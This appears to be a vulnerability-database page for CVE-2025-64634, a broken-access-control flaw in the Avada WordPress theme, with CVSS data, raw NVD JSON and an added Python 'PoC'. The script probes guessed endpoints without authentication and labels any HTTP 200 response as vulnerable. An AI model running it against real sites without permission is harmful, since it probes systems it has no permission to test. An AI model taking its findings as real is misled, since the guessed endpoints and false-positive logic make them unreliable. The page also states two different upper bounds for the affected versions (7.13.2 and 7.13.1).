Security Vulnerability Report
中文
CVE-2025-64634 CVSS 5.3 MEDIUM

CVE-2025-64634

Published: 2025-12-16 09:15:56
Last Modified: 2026-04-27 16:16:43

Description

Missing Authorization vulnerability in ThemeFusion Avada avada allows Accessing Functionality Not Properly Constrained by ACLs.This issue affects Avada: from n/a through <= 7.13.2.

CVSS Details

CVSS Score
5.3
Severity
MEDIUM
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:N

Configurations (Affected Products)

cpe:2.3:a:theme-fusion:avada:*:*:*:*:*:wordpress:*:* - VULNERABLE
Avada <= 7.13.2

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
# CVE-2025-64634 Avada Theme Missing Authorization PoC # Target: WordPress sites with Avada theme <= 7.13.2 # Vulnerability: Missing Authorization / Broken Access Control import requests import sys def check_vulnerability(target_url): """Check if target is vulnerable to CVE-2025-64634""" # Common Avada endpoints that may be affected vulnerable_endpoints = [ "/wp-json/avada/v1/settings", "/wp-json/avada/v1/options", "/wp-admin/admin-ajax.php", "/wp-content/themes/avada/framework/plugins/avada-plugin-updater.php" ] headers = { 'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) Avada-Security-Scanner/1.0', 'Content-Type': 'application/json' } print(f"[*] Scanning target: {target_url}") print(f"[*] Vulnerability: CVE-2025-64634 - Avada Missing Authorization") print("=" * 60) for endpoint in vulnerable_endpoints: url = target_url.rstrip('/') + endpoint try: # Test unauthenticated access response = requests.get(url, headers=headers, timeout=10, verify=False) # Check if endpoint is accessible without authentication if response.status_code == 200: print(f"[+] VULNERABLE: {endpoint}") print(f" Status: {response.status_code}") print(f" Response Length: {len(response.text)} bytes") if len(response.text) > 0: print(f" Preview: {response.text[:200]}...") elif response.status_code == 403: print(f"[-] Protected: {endpoint} (403 Forbidden)") else: print(f"[*] Endpoint: {endpoint} (Status: {response.status_code})") except requests.exceptions.RequestException as e: print(f"[!] Error testing {endpoint}: {str(e)}") print("=" * 60) print("[*] Scan complete. If vulnerable endpoints found, update Avada theme immediately.") if __name__ == "__main__": if len(sys.argv) < 2: print("Usage: python cve-2025-64634-poc.py <target_url>") print("Example: python cve-2025-64634-poc.py http://example.com") sys.exit(1) target = sys.argv[1] check_vulnerability(target)

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-64634", "sourceIdentifier": "[email protected]", "published": "2025-12-16T09:15:55.737", "lastModified": "2026-04-27T16:16:42.880", "vulnStatus": "Modified", "cveTags": [], "descriptions": [{"lang": "en", "value": "Missing Authorization vulnerability in ThemeFusion Avada avada allows Accessing Functionality Not Properly Constrained by ACLs.This issue affects Avada: from n/a through <= 7.13.2."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:N", "baseScore": 5.3, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "LOW", "availabilityImpact": "NONE"}, "exploitabilityScore": 3.9, "impactScore": 1.4}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-862"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:theme-fusion:avada:*:*:*:*:*:wordpress:*:*", "versionEndIncluding": "7.13.1", "matchCriteriaId": "6619257F-9289-4E61-9202-A23772AA6B86"}]}]}], "references": [{"url": "https://patchstack.com/database/Wordpress/Theme/avada/vulnerability/wordpress-avada-theme-7-13-1-broken-access-control-vulnerability?_s_id=cve", "source": "[email protected]"}]}}